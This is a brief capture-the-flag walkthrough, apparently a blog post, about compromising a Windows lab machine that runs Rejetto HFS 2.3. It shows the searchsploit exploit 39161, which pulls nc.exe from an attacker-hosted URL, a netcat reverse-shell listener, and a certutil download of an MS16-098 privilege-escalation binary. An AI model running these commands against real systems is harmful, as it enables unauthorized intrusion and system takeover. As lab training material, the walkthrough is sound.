1 minute read


Port Scanning and General Enumeration (Nmap)

Initial scan showed that only port 80 (HTTP) is available



Clicking the link takes us to www.rejetto.com

What we know:

  • It’s running HttpFileServer 2.3
  • The vendor is rejetto

Access (searchsploit, Rejetto HFS RCE)

Let’s see if there’s anything on searchsploit for rejetto or http file server 2.3

searchsploit rejetto


Let’s grab Remote Command Execution (2)

searchsploit -m 39161.py

-m allows us to copy the exploit into our current working directory.

Let’s read a bit about what it does


#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

So we need to be hosting nc.exe on port 80. That’s easy enough. On kali, windows binaries are stored at /usr/share/windows-binaries


Now we’re going to need a few tabs:

  • On one, our python server (python3 -m http.server 80) where nc.exe is located
  • On another, a listener waiting to catch our shell (nc -lvnp 4444)
  • And finally, one to fire the exploit

This is what mine looked like after the exploit completed:



Privesc (Windows Exploit Suggester, MS16-098)

I ran winPEAS on the machine but didn’t come back with much so I assume that maybe we’re looking at a kernel exploit. Let’s try Windows Exploit Suggester

Note: for Windows Exploit Suggester to work we need to install a specific version of xlrd:

pip2 install --user xlrd==1.1.0

There’s a couple things we need to do before we can run this.

  • First, run it with the --update switch. That will write an xls file for us to use.
  • Second, on the victim machine, use the command systeminfo and copy all of the output and save it to a file. I’ll name my systeminfo.txt
  • Now run it:

python windows-exploit-suggester.py -database 2021-01-25-mssb.xls -systeminfo systeminfo.txt


Let’s look at MS16-098. There’s a precompiled binary for us to grab on the github page. Let’s grab that and transfer it over to the victim machine.

certutil -urlcache -f Http:// ms16098.exe


Give it a run!